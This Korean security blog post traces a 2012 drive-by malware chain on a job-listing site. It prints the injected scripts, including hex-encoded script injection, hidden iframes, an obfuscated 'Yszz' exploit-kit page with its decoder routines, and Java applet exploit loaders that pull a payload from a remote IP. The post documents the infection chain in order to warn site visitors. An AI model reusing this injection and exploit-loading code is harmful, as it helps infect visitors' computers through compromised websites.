발견지 : http://www.icross.co.kr [교차로]
→http://festival.cocobau.com/adm_site/e_show/e_th_abd.js
→http://173.245.86.205/pic/img.js
→http://173.245.86.205/pic/img.html (Yszz 1.5 vip)
→ http://173.245.86.152/img/jpg.css (최종파일)
→ http://173.245.86.205/pic/swfobject.js
→ http://173.245.86.205/pic/jpg.js
→http://173.245.86.205/pic/css.html
http://festival.cocobau.com/adm_site/e_show/e_th_abd.js
-----------------------------------------------------------------------------------------------
if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%37%33[생략]3E%3C%2F%73%63%72%69%70%74%3E"));}
http://173.245.86.205/pic/img.js
-----------------------------------------------------------------------------------------------
var Zcy6MU=navigator.userAgent.toLowerCase();
if(document.cookie.indexOf("mOV6Pgrf")==-1 && Zcy6MU.indexOf("Safari")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="mOV6Pgrf=Yes;path=/;expires="+expires.toGMTString();
document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://173.245.86.205/pic/img.html\"></iframe>");
document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://173.245.86.205/pic/css.html\"></iframe>");
}
http://173.245.86.205/pic/img.htm
var K4Er = "%";
var MDIxo=K4Er+"78"+K4Er+"6F";
var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";
var HHYWv=K4Er+"31"+K4Er+"59"+"%53";
var CvXWz=K4Er+"7A"+"%7A"+"%31";
var JZyjl=K4Er+"31"+"%6F"+"%78";
var ERb7H="%6F"+"%78";
var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="
SxoCgWBKhwTnhbKKvyhglFbDI8vGLakQIWymnWKeCk
[생략]
V4rVoO9tDGGcT+gxv+YEN7BYdH+oBpSPPprdnJdlAqGPs4bg=
",HUx2Ydz=K4Er+"64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",sac5pxhFS=
"%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;
var kxin1s = "%53"+"%74"+"%72";
var B83pNx = kxin1s+"%69"+"%6e"+"%67";
var kxin2s = "%66"+"%72"+"%6f";
var kxin3s = "%6d"+"%43"+"%68";
var kxin4s = "%61"+"%72"+"%43";
var kxin5s = "%6f"+"%64"+"%65";
var WjuQFO = kxin2s+kxin3s+kxin4s+kxin5s;
var fxTmFiR = AVgHbu2f(B83pNx);
var xZW9RVt = AVgHbu2f(WjuQFO);
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";
var x83QqGV = AVgHbu2f(sATWUn);
var SnDN8 = "%73"+"%74"+"%72";
var Z0b9A = "%63"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"+"%41"+"%74";
var fkPj5 = AVgHbu2f(SnDN8);
var hyYQ8 = AVgHbu2f(Z0b9A);
function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=fkPj5[hyYQ8](i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=fkPj5[hyYQ8](i++);char3=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,[생략]-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,
38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
HUx2Ydz=AVgHbu2f(HUx2Ydz);
function ZjykejU6(str)
{var YS1,YS2,YS3,YS4;/*Yszz 0.11 vip*/var i,len,out;
len=str.length;i=0;out = "";
while(i<len)
{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);
if(YS1==-1)
break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);
if(YS2==-1)
break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));
do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)
return out;
YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);
if(YS3==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));
do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)
return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
sac5pxhFS=AVgHbu2f(sac5pxhFS);
KWZAooZ=Cn6T4bG0znIi;
KWZAooZ=tzWmUni(kaixin(ZjykejU6(KWZAooZ), ubo8KLEZHIPX2));
window[HUx2Ydz][sac5pxhFS] (KWZAooZ);
var RWkTTC8=navigator.userAgent.toLowerCase();
if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 &&
[생략]
{
var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();
var kaixiny=document.createElement('body');
document.body.appendChild(kaixiny);
var kaixinm=deployJava.getJREs()+"";
kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));
if (kaixinm<=17006)
{
var kaixin=document.createElement('applet');
kaixin.width="1";
kaixin.height="1";
if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))
{
kaixin.archive="0jDBDaQC.jpg";
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("dota","http://173.245.86.152/img/jpg.css");
document.body.appendChild(kaixin);
}
else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))
{
kaixin.archive="XyAPlXp.jpg";
kaixin.code="gond1723.Gondattack.class";
kaixin.setAttribute("xiaomaolv","http://173.245.86.152/img/jpg.css");
kaixin.setAttribute("bn","woyouyizhixiaomaolv");
kaixin.setAttribute("si","conglaiyebuqi");
kaixin.setAttribute("bs","748");
document.body.appendChild(kaixin);
}
else
{
var ques3 = window.navigator.userAgent.toLowerCase();
if (ques3.indexOf("msie 6") > -1....write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://173.245.86.152/img/jpg.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'F8xzd.jpg'></OBJECT>");
}
else
{
document.write("<br>");
var kaixinq = document.createElement("body");
document.body.appendChild(kaixinq);
var kaixiny = document.createElement("applet");
kaixiny.width = "256";
kaixiny.height = "256";
kaixiny.archive = "F8xzd.jpg";
kaixiny.code = "cve2012xxxx.Gondvv.class";
kaixiny.setAttribute("xiaomaolv", "http://173.245.86.152/img/jpg.css");
kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
kaixiny.setAttribute("si", "conglaiyebuqi");
kaixiny.setAttribute("bs", "748");
document.body.appendChild(kaixiny);
}
}
}
else {
var pcss=navigator.userAgent.toLowerCase();
var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
if ((UaYcKzD2.indexOf('msie 8.0') > -1))
{
document.writeln("<iframe src=thotMy.html><\/iframe>");
}
else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{
document.writeln("<iframe src=1ryxA.html><\/iframe>");
}
}
}
유심히 지켜볼 사이트이다..... 구인 구직 구하러 들어갔다가.. 악성코드에 감염되지 않게 조심해야겠다!
'security > 악성코드 유포' 카테고리의 다른 글
| 골칫덩어리! JSXX 0.44 VIP 디코딩 ! (2) | 2012.12.23 |
|---|---|
| 음반사이트 → http://www.leesmusic.co.kr (리스뮤직) 악성스크립트 유포중! (0) | 2012.12.08 |
| 중앙정보처리학원 → http://it.choongang.co.kr 악성 스크립트 유포중!! (0) | 2012.11.02 |
| 우연히 발견한 악성스크립트 ! (3) | 2012.10.16 |
| Yszz 1.5 vip ! (1) | 2012.10.06 |